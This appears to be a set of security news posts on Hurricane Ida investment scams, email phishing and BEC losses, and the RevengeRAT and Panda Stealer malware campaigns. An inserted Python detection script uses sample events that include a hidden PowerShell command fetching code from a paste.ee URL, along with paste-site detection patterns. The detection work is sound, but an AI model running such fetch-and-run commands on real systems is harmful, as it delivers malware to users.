
SEC: Watch Out for Hurricane Ida Related Investment Scams

 

The Securities and Exchange Commission (SEC) has issued a warning about fraud associated with Hurricane Ida, which wreaked havoc in numerous states last week with torrential rain and tornadoes, leaving millions without power. 

The SEC's Office of Investor Education and Advocacy releases investor alerts regularly to caution investors about the latest investment frauds and scams. Fraudsters would most likely target people who may receive compensation from insurance companies in the form of huge payouts as a direct result of Hurricane Ida's destruction. 

The SEC explained, “These scams can take many forms, including promoters touting companies purportedly involved in cleanup and repair efforts, trading programs that falsely guarantee high returns, and classic Ponzi schemes where new investors' money is used to pay money promised to earlier investors." 

"Some scams may be promoted through email and social media posts promising high returns for small, thinly-traded companies that supposedly will reap huge profits from recovery and cleanup efforts." 

AccuWeather CEO, Dr Joel Myers calculated that Hurricane Ida caused almost $95 billion in total damage and economic loss. Millions of individuals will now have to deal with insurance companies to cover the cost of water damage and other difficulties caused by the hurricane's aftermath. 

The SEC added that following the devastation by Hurricane Katrina in 2005, they were compelled to take action against hundreds of false and misleading statements concerning alleged business prospects.

Precautionary Measures

On mitigating the risk and taking preventive measures, the SEC urged, "Be sceptical if you are approached by somebody touting an investment opportunity. Ask that person whether he or she is licensed and whether the investment they are promoting is registered with the SEC or with a state." 

"Take a close look at your entire financial situation before making any investment decision, especially if you are a recipient of a lump sum payment. Remember, your payment may have to last you and your family for a long time." 

This advisory follows the one issued by the FBI's New Orleans office, which warned the public about an elevated risk of scammers attempting to profit from the natural calamity. 

"Unfortunately, hurricane or natural disaster damage often provides opportunities for criminals to scam storm victims and those who are assisting victims with recovery," the FBI warned. 

The FBI also offered a list of safeguards that victims of natural disasters should follow to avoid getting scammed, including: 
  • Unsolicited (spam) emails should be ignored. 
  • Be cautious of anyone posing as government officials and requesting money via email. 
  • Do not click on links in unsolicited emails. 
  • Only open attachments from known senders; be wary of emails purporting to have photos in attached files, as the files may contain viruses. 
  • Do not give out personal or financial information to anybody asking for donations; doing so might jeopardize your identity and leave you vulnerable to identity theft. 
  • Be vigilant of emails purporting to provide employment. 
  • Before transferring money to a potential landlord, do your research on the advertisement.

Email Fatigue Elevates Cyber Crime Rates

 

According to research, email is the preferred medium of communication for almost 86 percent of professionals. The average office employee receives 121 emails a day and sends roughly 40 business emails, and Radicati Group's 2017 study reports that 269 billion emails are sent daily to just over 3.7 billion email users worldwide. Consequently, email-based cyber-attacks are also skyrocketing. 

Furthermore, because of the broad shift to a work-from-home culture during the pandemic, more vital data is communicated through email than ever. Users can receive hundreds of emails every day, and screening them takes time and effort. 

Given the rising volume, it is no surprise that email fatigue is growing. Unfortunately, this exhaustion makes it easier for people to click on a harmful email, which helps explain why 94 percent of malware is currently delivered by email. 

Email fatigue is the term used to describe a condition where email users feel overwhelmed by the emails they receive. This can often lead to unsubscriptions, low commission rates, or even a large number of spam reports. 

However, while spam is an old-school approach, it is still being used for nefarious purposes by hackers. Fake unsubscribe links are a strategy that cybercriminals employ to grow their mailing lists and validate email addresses: whenever a user clicks the bogus link in a spam email, the spammer learns that the address is correct, active, and regularly checked. From there the user can receive additional malicious payloads by email. 

Notable phishing attacks include the one on Five Rivers Health Centers in Dayton, Ohio, where 155,000 patients' details were exposed for two months owing to an email phishing attack, and the more than 10,000 phishing scams exploiting common coronavirus concerns that were investigated in 2020 by Her Majesty's Revenue and Customs (HMRC) in the UK. 

Successful spear phishing accounts for 95 percent of attacks on enterprise networks. The co-founder of the Australian hedge fund Levitas Capital was the target of a whaling attack, a form of spear phishing, in November 2020. Although it cost the company $800,000, a little below the initially anticipated 8 million dollars, it also cost the hedge fund its largest customer. In the end, the company had to close permanently. 

A 2019 cybersecurity investigation indicated that 26 percent of global firms had been compromised by one to ten BEC (business email compromise) attacks. Recent BEC attacks include: 

  • Shark Tank host Barbara Corcoran, who lost $380,000; 
  • the Puerto Rican government, which lost $4 million; 
  • Japan's media powerhouse Nikkei, which sent $29 million following the instructions in a bogus email.

Cybercriminals constantly refine their email techniques by playing on a victim's emotions: instilling fear, exploiting greed, preying on curiosity, appealing for help, or lulling users into a false sense of comfort. This strategy is frequently employed by ransomware-as-a-service attackers. 

A one-and-done strategy never works when it comes to email security. Malware can slip past a single defense, so a solution must include several protective layers: if malware defeats one layer, a subsequent layer stops it. 

Using a multi-layered approach paired with Acronis Cyber Protect technologies, including URL filtering, can block harmful domains and malware downloads before they reach the first affected systems.

RevengeRAT is Targeting the Aerospace and Travel Sectors with Spear-Phishing Emails

 

Microsoft has issued a warning about a remote access tool (RAT) called RevengeRAT, which it says is being spread through spear-phishing emails targeting the aerospace and travel industries.

RevengeRAT is a remote access trojan (RAT) classified as a high-risk infection. The malware aims to give cybercriminals remote access to infected computers so they can control them. According to research, cybercriminals spread this infection through spam email campaigns carrying malicious MS Office attachments. Having a trojan-type infection such as RevengeRAT on a device can cause a slew of problems. 

Attackers can use RevengeRAT to monitor system services, processes and files; edit the Windows Registry and hosts file; log keystrokes; steal account passwords; access hardware such as a webcam; run shell commands; and so on. As a result, they have the potential to cause serious harm. 

RevengeRAT, also known as AsyncRAT, is spread by carefully designed email messages that instruct recipients to open a file that appears to be an Adobe PDF attachment but actually installs a malicious Visual Basic (VB) file. 

Both RATs were recently identified by security company Morphisec as payloads of a sophisticated Crypter-as-a-Service that delivers multiple RAT families. According to Microsoft, the phishing emails deliver a loader, which then drops RevengeRAT or AsyncRAT. Morphisec says the service can also deliver the Agent Tesla RAT. 

"The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads," Microsoft said. 

Morphisec named the crypter service "Snip3" after a username it discovered in earlier malware variants. If Snip3 detects that a RAT is being executed inside the Windows Sandbox, a virtual machine security feature Microsoft launched in 2018, it will not load it. Advanced users can use the Windows Sandbox to run potentially malicious executables in an isolated environment that won't harm the host operating system.

"If configured by [the attacker], the PowerShell implements functions that attempt to detect if the script is executed within Microsoft Sandbox, VMWare, VirtualBox, or Sandboxie environments," Morphisec notes. "If the script identifies one of those virtual machine environments, the script terminates without loading the RAT payload."

Panda Stealer Spreads Via Discord to Steal User Crypto-Currency

 

A new type of malware, Panda Stealer, is spreading through a global spam campaign. Trend Micro researchers reported on Tuesday that they first encountered the stealer in April. The latest surge of the spam campaign appears to have hit Australia, Germany, Japan, and the USA hardest. 

The spam emails disguise booby-trapped Excel files as nothing more than business quote requests to lure victims into opening them. Researchers found 264 Panda Stealer-like files on VirusTotal, some of which are exchanged by threat actors operating via Discord. 

Given recent developments, this isn't shocking. Cisco's Talos cybersecurity team recently observed that some threat actors are using workflow and communication tools such as Slack and Discord to sneak past security controls and deliver stealers, remote access trojans (RATs), and other malware. Now, it appears, threat actors may be using Discord to share Panda Stealer as well. 

Once Panda is installed, it attempts to collect data such as private keys and records of past transactions from cryptocurrency wallets including Bytecoin (BCN), Dash (DASH), Ethereum (ETH), and Litecoin (LTC). In addition to stealing wallets, it also targets applications such as NordVPN, Telegram, Discord, and Steam. Panda can also take screenshots and lift browser data, including cookies and passwords, from infected computers. 

The researchers identified two infection chains. In one, an .XLSM attachment contains macros that install a loader, which then executes the stealer. In the other, an .XLS attachment containing an Excel formula causes PowerShell to fetch content from paste.ee, a Pastebin alternative, which in turn holds a second, encrypted PowerShell command. 

"The CallByName export function in Visual Basic is used to call a load of a .NET assembly within memory from a paste.ee URL," Trend Micro says. "The loaded assembly, obfuscated with an Agile.NET obfuscator, hollows a legitimate MSBuild.exe process and replaces it with its payload: the hex-encoded Panda Stealer binary from another paste.ee URL." 
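The infection chain described above (Excel spawning PowerShell, a paste.ee fetch, and MSBuild.exe launched from an unusual parent) leaves a recognisable trail in process-creation telemetry. The following is an added detection example, not code from Trend Micro or the original post; the event shape, field names and sample events are constructed, Sysmon-style assumptions.

```python
import re

# Constructed sample process-creation events in a Sysmon-like shape; not real telemetry.
# Events 4120 and 4188 mimic the page's chain (Excel -> PowerShell -> paste.ee -> MSBuild.exe);
# events 5002 and 5120 are benign noise that the rules must not flag.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c \"(fetch https://paste.ee/r/CONSTRUCTED)\""},
    {"pid": 4188, "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe"},
    {"pid": 5002, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": "\"EXCEL.EXE\" quote_request.xls"},
    {"pid": 5120, "parent_image": r"C:\Program Files\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe MyApp.sln"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Parents from which MSBuild.exe is normally launched; anything else is worth a look.
MSBUILD_OK_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe"}
PASTE_SITES = re.compile(r"paste\.ee|pastebin\.com", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the names of the rules that fire for one process-creation event."""
    parent, child, cmd = basename(event["parent_image"]), basename(event["image"]), event["cmdline"]
    hits = []
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        hits.append("office_spawned_script_host")
    if PASTE_SITES.search(cmd):
        hits.append("paste_site_in_cmdline")
    if child == "msbuild.exe" and parent not in MSBUILD_OK_PARENTS:
        hits.append("msbuild_unusual_parent")
    return hits

def triage(events):
    """Map pid -> fired rules, keeping only events that triggered at least one rule."""
    result = {}
    for event in events:
        hits = classify(event)
        if hits:
            result[event["pid"]] = hits
    return result

if __name__ == "__main__":
    for pid, rules in triage(SAMPLE_EVENTS).items():
        print(pid, ", ".join(rules))
```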

Panda Stealer is a modified version of the Collector Stealer malware (also called DC Stealer), which has been sold for as little as $12 on an underground marketplace and via Telegram. It is advertised as a "top-end information stealer" and also has a Russian connection. Collector Stealer was cracked by a threat actor known as NCP, also identified as su1c1de. The cracked stealer and Panda Stealer behave similarly but do not share the same URLs, tags, or execution files. 

“Cybercriminal groups and script kiddies alike can use it to create their customized version of the stealer and C2 panel,” Trend Micro researchers said. “Threat actors may also augment their malware campaigns with specific features from Collector Stealer.” 

Trend Micro says there are parallels to Phobos ransomware in the attack chain. In particular, its distribution method is identical to that of the Phobos "Fair" variant described by Morphisec, which is continuously revised to shrink its footprint, for example by reducing the encryption criteria, so that it stays under the radar for as long as possible.